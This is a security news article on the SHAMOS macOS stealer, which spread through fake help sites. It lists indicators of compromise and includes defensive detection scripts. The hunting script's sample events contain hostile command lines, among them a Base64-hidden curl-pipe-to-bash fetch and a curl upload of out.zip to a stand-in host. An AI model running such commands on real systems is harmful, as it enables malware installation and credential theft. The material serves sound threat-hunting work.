New SHAMOS Malware Targets macOS Through Fake Help Sites to Steal Login Credentials

Cybersecurity researchers at CrowdStrike identified and thwarted a sophisticated malware campaign deploying SHAMOS, an advanced variant of the Atomic macOS Stealer (AMOS) malware, orchestrated by the cybercriminal group COOKIE SPIDER.

Operating under a malware-as-a-service model, COOKIE SPIDER rents out this information stealer to affiliates who target victims to harvest sensitive data, including login credentials, cryptocurrency wallets, and other personal information.

The campaign attempted to compromise over 300 customer environments but was successfully blocked by the CrowdStrike Falcon platform, highlighting the growing threat of macOS-specific malware in the eCrime ecosystem.

This operation relied on malvertising tactics, where fraudulent macOS help websites were promoted in search engine results, luring users seeking solutions for common issues like flushing the resolver cache.

Campaign Discovery

Victims from countries such as the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy were targeted, with a notable exclusion of Russia and Commonwealth of Independent States nations, aligning with prohibitions in Russian eCrime forums against attacking domestic users.

(Figure: Google advertising profile)

The malvertising directed users to spoofed sites mimicking legitimate macOS support pages, such as mac-safer[.]com and rescue-mac[.]com, which walked the visitor through pasting a one-line "installation" command into Terminal as the supposed fix for their problem.

This command, often Base64-encoded so that its contents are not obvious, downloaded and ran a Bash script that prompted for and captured the user's password and then fetched the SHAMOS Mach-O executable.

This is how the campaign sidestepped Gatekeeper: Gatekeeper only evaluates files that carry the com.apple.quarantine extended attribute, which browsers set on downloads. A binary fetched by curl from a Terminal command never receives that attribute, and the script strips extended attributes anyway, so the unsigned, unnotarized SHAMOS binary ran without any signature or notarization prompt.

Similar tactics have been observed in prior campaigns involving Cuckoo Stealer and SHAMOS, including malvertising for Homebrew between May 2024 and January 2025, as well as opportunistic GitHub repositories posing as free macOS tools like video editors, CAD software, and AI applications.

Persistence Mechanisms

Upon execution, the Bash script downloads the SHAMOS Mach-O into the /tmp/ directory, removes its extended file attributes (including the quarantine attribute) with xattr, marks it executable with chmod, and launches it; SHAMOS then runs anti-VM checks to avoid executing in sandbox or analysis environments.

It then leverages AppleScript for reconnaissance, scanning for cryptocurrency wallet files, Keychain data, Apple Notes, and browser credentials.

Collected data is archived into a ZIP file named out.zip and exfiltrated via curl commands to attacker-controlled servers.

Further payloads, including a spoofed Ledger Live wallet app and a botnet module, are deployed as hidden files in the user’s home directory.

If sudo privileges are available, SHAMOS establishes persistence by writing a launchd property list (com.finder.helper.plist) into /Library/LaunchDaemons, a root-owned directory, so that the payload is started again at boot and long-term access is retained.

CrowdStrike’s observations noted multiple curl invocations indicative of botnet activity, underscoring the malware’s modular design for extended compromise.

Open-source reports corroborated these findings, detailing a related campaign via a fake GitHub repository mimicking iTerm2, a popular macOS terminal emulator.

This repository instructed users to run a similar one-line command, fetching SHAMOS from domains like macostutorial[.]com, demonstrating the actors’ preference for blending social engineering with technical evasion.

CrowdStrike assesses with high confidence that eCrime actors will persist in using malvertising and one-line installation commands for macOS stealer distribution, given their proven efficacy in bypassing Gatekeeper and driving victim traffic.

The Falcon platform’s machine learning and indicators of attack (IOAs) provide layered detection, preventing SHAMOS at download, execution, and exfiltration stages.

For protection, users should enable suspicious process prevention and intelligence-sourced threat prevention in Falcon Insight XDR policies.

Threat hunters can use Falcon Next-Gen SIEM queries to surface risky behaviours, such as Bash scripts that call dscl, curl, xattr, and chmod in close succession, or AppleScript (osascript) executed by a binary running from /tmp/.
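The hunting idea above (and the install chain described earlier on this page) can be expressed as a small session-level scorer. The following is an added example written for this article, not CrowdStrike's query or tooling: it groups process command lines by terminal session, decodes any "echo <base64> | base64 -d | bash" stage so the hidden command is scanned as well, and flags a session once several of the indicators named on this page (curl, xattr, chmod, dscl, /tmp execution, osascript, piping into a shell) appear together. The event format, the session identifiers, the example.invalid URLs and the exact dscl invocation are assumptions; the sample events are constructed, not real telemetry.

```python
import base64
import re
from collections import defaultdict

# Behaviours the write-up ties to the SHAMOS installer chain. Any one of them alone
# is ordinary admin activity; several of them in the same terminal session are not.
INDICATORS = {
    "curl_download": re.compile(r"\bcurl\b"),
    "xattr_strip":   re.compile(r"\bxattr\s+(-c\b|-d\s+com\.apple\.quarantine)"),
    "chmod_exec":    re.compile(r"\bchmod\s+\S*[x7]"),
    "dscl_call":     re.compile(r"\bdscl\b"),
    "tmp_execution": re.compile(r"(^|[\s;&|])/tmp/\S+"),
    "osascript":     re.compile(r"\bosascript\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
}
# "echo <base64> | base64 -d | bash" style one-liners; the decoded text is scanned too.
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(-d|-D|--decode)"
)
FLAG_THRESHOLD = 3  # distinct indicators in one session before it is raised


def stages_of(cmdline: str) -> list[str]:
    """The command line itself plus any Base64 payload it pipes into a decoder."""
    stages = [cmdline]
    for m in B64_PIPE.finditer(cmdline):
        try:
            stages.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid Base64; scan the literal line only
    return stages


def hunt_sessions(events, threshold=FLAG_THRESHOLD) -> dict:
    """Group process events by session and report which sessions cross the threshold.

    Each event is a dict with a 'session' key (terminal or parent shell, an assumed
    field name) and a 'cmdline' key; nothing else from an EDR feed is needed here.
    """
    sessions = defaultdict(lambda: {"hits": set(), "decoded": [], "commands": []})
    for ev in events:
        s = sessions[ev["session"]]
        s["commands"].append(ev["cmdline"])
        stages = stages_of(ev["cmdline"])
        s["decoded"].extend(stages[1:])
        for stage in stages:
            for name, rx in INDICATORS.items():
                if rx.search(stage):
                    s["hits"].add(name)
    return {
        sid: {"hits": sorted(s["hits"]), "decoded": s["decoded"],
              "flagged": len(s["hits"]) >= threshold, "commands": s["commands"]}
        for sid, s in sessions.items()
    }


# Constructed sample events, not real telemetry. Session tty001 is an admin fetching a
# text file; tty002 mirrors the chain described in the article (decode-and-pipe
# one-liner, password check via dscl, quarantine attribute stripped, chmod, execution
# from /tmp, AppleScript reconnaissance, upload of out.zip).
_ONE_LINER = base64.b64encode(b"curl -fsSL https://example.invalid/install.sh | bash").decode()
SAMPLE_EVENTS = [
    {"session": "tty001", "cmdline": "curl -fsSL https://example.com/readme.txt -o readme.txt"},
    {"session": "tty001", "cmdline": "chmod 644 readme.txt"},
    {"session": "tty002", "cmdline": f"echo '{_ONE_LINER}' | base64 -d | bash"},
    {"session": "tty002", "cmdline": "dscl . -authonly jdoe"},  # assumed form of the dscl call
    {"session": "tty002", "cmdline": "xattr -c /tmp/update"},
    {"session": "tty002", "cmdline": "chmod +x /tmp/update"},
    {"session": "tty002", "cmdline": "/tmp/update"},
    {"session": "tty002", "cmdline": "osascript -e 'tell application \"Finder\" to get name of every item of home'"},
    {"session": "tty002", "cmdline": "curl -X POST -F file=@/tmp/out.zip https://example.invalid/upload"},
]

if __name__ == "__main__":
    for sid, r in hunt_sessions(SAMPLE_EVENTS).items():
        print(sid, "FLAGGED" if r["flagged"] else "ok", r["hits"])
```

Scoring per session rather than per process is the point: each command on its own (a curl, a chmod) is noise, and a threshold on distinct behaviours keeps the rule from firing on a developer who runs curl all day while still catching the six- or seven-step chain the fake help sites instruct the victim to run. Decoding the Base64 stage matters because the literal one-liner exposes only echo, base64 and bash; the curl and the download URL live inside the encoded text.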

Indicators of Compromise (IoCs)

Malvertising websites (sites containing instructions to download SHAMOS):
    mac-safer[.]com
    rescue-mac[.]com
    https[:]//github[.]com/jeryrymoore/Iterm2

Bash script SHA256 hashes (malicious installer scripts):
    231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f
    eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68

SHAMOS Mach-O SHA256 hashes (SHAMOS executables):
    4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f
    b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5
    a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322
    95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877

Bash script host URLs (URLs hosting the malicious Bash scripts):
    https[:]//icloudservers[.]com/gm/install[.]sh
    https[:]//macostutorial[.]com/iterm2/install[.]sh

SHAMOS host URLs (URLs hosting SHAMOS payloads):
    https[:]//icloudservers[.]com/gm/update
    https[:]//macostutorial[.]com/iterm2/update
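A host-side triage script ties the IoC table above to the persistence behaviour described earlier (the com.finder.helper.plist launch daemon and hidden payloads under the home directory). The code below is an added example written for this article, not CrowdStrike's tooling: it parses launchd plists and reports ones whose label matches the reported persistence plist or whose program runs from /tmp or from a hidden path under the user's home, and it sweeps directories for files whose SHA-256 is in the IoC set. The home path /Users/jdoe, the plist contents and the placeholder file are constructed; because the real payloads are not available, the demo exercises the hash sweep with the digest of its own placeholder file.

```python
import hashlib
import os
import plistlib
import tempfile
from pathlib import Path

# SHA-256 hashes from the article's IoC table (installer scripts and SHAMOS Mach-O files).
IOC_SHA256 = {
    "231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f",
    "eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68",
    "4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f",
    "b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5",
    "a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322",
    "95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877",
}
# Launch daemon label the article reports SHAMOS writes when it has sudo.
IOC_LABELS = {"com.finder.helper"}
LAUNCH_DIRS = ["/Library/LaunchDaemons", "/Library/LaunchAgents"]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_sweep(roots, iocs=IOC_SHA256) -> list[str]:
    """Walk the given directories and return paths whose SHA-256 is in the IoC set."""
    matches = []
    for root in roots:
        for p in Path(root).rglob("*"):
            try:
                if p.is_file() and not p.is_symlink() and sha256_of(p) in iocs:
                    matches.append(str(p))
            except OSError:
                continue  # unreadable or vanished file; keep sweeping
    return matches


def audit_plist(name: str, data: bytes, home: str) -> list[str]:
    """Return reasons a launchd plist looks like SHAMOS persistence (empty if clean)."""
    reasons = []
    try:
        plist = plistlib.loads(data)
    except Exception:
        return [f"{name}: not a parsable plist"]
    label = plist.get("Label", "")
    if label in IOC_LABELS or Path(name).stem in IOC_LABELS:
        reasons.append(f"{name}: label {label!r} matches the reported SHAMOS persistence plist")
    args = list(plist.get("ProgramArguments") or [])
    if isinstance(plist.get("Program"), str):
        args.insert(0, plist["Program"])
    for a in args:
        if not isinstance(a, str) or not a.startswith("/"):
            continue
        if a.startswith(("/tmp/", "/private/tmp/")):
            reasons.append(f"{name}: runs a program from a temporary directory: {a}")
        rel = os.path.relpath(a, home)
        if not rel.startswith("..") and any(part.startswith(".") for part in Path(rel).parts):
            reasons.append(f"{name}: runs a hidden file under the home directory: {a}")
    return reasons


def audit_launch_dirs(dirs=LAUNCH_DIRS, home=None) -> list[str]:
    """Audit every *.plist in the launchd directories of this machine."""
    home = home or str(Path.home())
    findings = []
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                findings.extend(audit_plist(p.name, p.read_bytes(), home))
            except OSError:
                continue
    return findings


def run_demo() -> dict:
    """Exercise both checks on constructed data so the script can be tried offline."""
    home = "/Users/jdoe"  # constructed home directory
    benign = plistlib.dumps({"Label": "com.example.backup",
                             "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
                             "RunAtLoad": True})
    suspicious = plistlib.dumps({"Label": "com.finder.helper",
                                 "ProgramArguments": ["/Users/jdoe/.helper/update"],
                                 "RunAtLoad": True})
    plist_findings = {
        "com.example.backup.plist": audit_plist("com.example.backup.plist", benign, home),
        "com.finder.helper.plist": audit_plist("com.finder.helper.plist", suspicious, home),
    }
    # The real payloads are not available, so the sweep is exercised with a placeholder
    # file and a hash set containing that file's own digest.
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "update"
        sample.write_bytes(b"constructed placeholder payload, not SHAMOS")
        Path(tmp, "readme.txt").write_text("benign file")
        hash_matches = [Path(h).name for h in hash_sweep([tmp], iocs={sha256_of(sample)})]
    return {"plist_findings": plist_findings, "hash_matches": hash_matches}


if __name__ == "__main__":
    import json
    print(json.dumps(run_demo(), indent=2))
    print(json.dumps(audit_launch_dirs(), indent=2))  # real launchd dirs on a Mac
```

On a live Mac, run it with sudo so /Library/LaunchDaemons is readable and point hash_sweep at /tmp and the user's home; the plist audit is the more durable check, since hashes change with every rebuild of the stealer while the persistence technique (a root-owned launchd job pointing at a hidden file) does not.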

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.